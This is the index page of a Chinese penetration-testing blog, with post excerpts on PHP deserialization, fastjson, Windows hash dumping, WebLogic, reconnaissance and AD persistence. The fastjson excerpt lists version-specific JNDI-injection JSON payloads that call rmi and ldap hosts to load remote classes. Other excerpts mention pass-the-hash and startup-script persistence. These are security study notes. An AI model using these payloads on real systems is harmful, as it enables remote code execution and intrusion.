Fork me on GitHub

blog迁移

前言

  • 要换电脑,迁移下blog,感觉有些东西还是要写出来才有点感觉

git配置

  • 环境该下的下载好,blog文件可以直接拖拽到另一台电脑上就行
  • 下面就是配置git 的ssh key,连接github blog仓库
阅读更多...

php反序列化

  • ctf中的php反序列化

前言

  • 序列化 即使用serialize();将类的对象的数据用字符串方式进行表示

  • 反序列化 即使用unserialize();来读取 序列化格式的数据

使用序列化和反序列化 主要是方便数据的存储和数据的转换读取。

阅读更多...

fastjson漏洞

前言

fastjson是alibaba开源的一个json解析库,将java对象和JSON格式字符相互转换。

jackson也有这样类似功能。Spring MVC 默认采用Jackson解析Json

https://github.com/alibaba/fastjson

原理解释:

在请求包里面中发送恶意的json格式payload,漏洞在处理json对象的时候,没有对@type字段进行过滤,从

而导致攻击者可以传入恶意的TemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据

这个_bytecodes生成java实例,这就达到fastjson通过字段传入一个类,再通过这个类被生成时执行构造函数。

环境配置

配置环境配了两个小时。。。各种报错

maven环境:http://maven.apache.org/download.cgi

idea 创建maven 项目

1
2
3
4
5
6
pom.xml引入fastjson依赖
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.62</version>
</dependency>

然后处理各种报错

1
2
3
4
pom.xml 加入
<build>
<defaultGoal>compile</defaultGoal>.
</build>

然后配置tomcat:Apache Tomcat® - Apache Tomcat 9 Software Downloads

Edit Configurations 配置:

image-20220417224659876

然后配置Project Structure :(28条消息) IDEA出现Please,configure Web Facet first的解决方式,或者是Servlet启动后 404_扶她小藜的博客-CSDN博客_idea please

参考:(28条消息) 在IDEA中创建maven项目,使用Fastjson 介绍json转换_华大哥的博客-CSDN博客_fastjson idea

复现log4j2 的时候也用到了下面两个请求方式

jndi

rmi

Fastjson 多版本payload集合

copy的零组文库

影响版本:

fastjson<=1.2.24

exp:

1
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.41

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

1
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.42

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

1
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本:

fastjson<=1.2.43

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

1
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本:

fastjson<=1.2.45

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

1
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

影响版本:

fastjson<=1.2.47

exp:

1
2
3
4
5
6
7
8
9
10
11
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://x.x.x.x:1999/Exploit",
"autoCommit": true
}
}

影响版本:

fastjson<=1.2.62

exp:

1
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"

影响版本:

fastjson<=1.2.66

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

1
2
3
4
5
6
7
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {

bypass

浅谈fastjson waf Bypass思路-SecIN (sec-in.com)

参考

safe6Sec/Fastjson: Fastjson姿势技巧集合 (github.com)

https://github.com/alibaba/fastjson

零组文库

内网抓hash/密码

前言

在winserver2012以后,windows保存的不是明文密码,只会保持密码的hash值

本地用户hash保存在SAM数据库中,域内用户密码hash保存在NTDS.dit文件中

常见格式:

1
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

AAD3B435B51404EEAAD3B435B51404EE是LM hash 这个是之前认证使用的,现在已经不使用了

31D6CFE0D16AE931B73C59D7E0C089C0是NTLM hash

域环境中,机器认证是利用kerberos协议,在内网渗透中,域环境中拿到普通域用户/域管 hash,可以尝试pth。

工作组环境中如果两台机器如果本地administrator账号密码一样也可能可以pth。

阅读更多...

Go

Go 语言被设计成一门应用于搭载 Web 服务器,存储集群或类似用途的巨型中央服务器的系统编程语言。

目的:

学习go写脚本和 免杀(其他大佬的有些免杀也是用go写的,效果不错,也算是为了能看懂代码吧)

go 没有类,有结构体,有指针,(主要是利用函数)。

阅读更多...

middleware

Weblogic

默认端口:7001

部分历史漏洞

1
2
3
4
5
6
7
1. 弱口令/任意文件读取+后台war包/任意文件上传getshell
2. CVE-2017-20271
3. CVE-2018-2628
4. CVE-2019-2725
5. CVE-2020-2555
6. CVE-2021-2394

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

WebLogic Server具有开发和部署关键任务电子商务Web应用系统 所需的多种特色和优势。

阅读更多...

信息收集

参考

本文参考:https://github.com/Qftm/Information_Collection_Handbook

参考:史上最全的子域名搜集方法(证书透明度/DNS记录/威胁情报/代码仓库/dns暴力破解/各种细节) - BIGHAMMERS - 博客园 (cnblogs.com)

域名信息

查询域名是否已经被注册,以及注册域名和注册人的详细信息

whois查询

阅读更多...

AD域的攻击方式

组策略

本地组策略 LGP

简称(Local Group Policy或者Local GPO)

win+R键打开运行,输入“gpedit.msc”

image-20220303233218371

添加对应脚本即可

或者将文件直接放入C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup 路径下 (可以开机自启)

通常用来权限维持

阅读更多...
  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信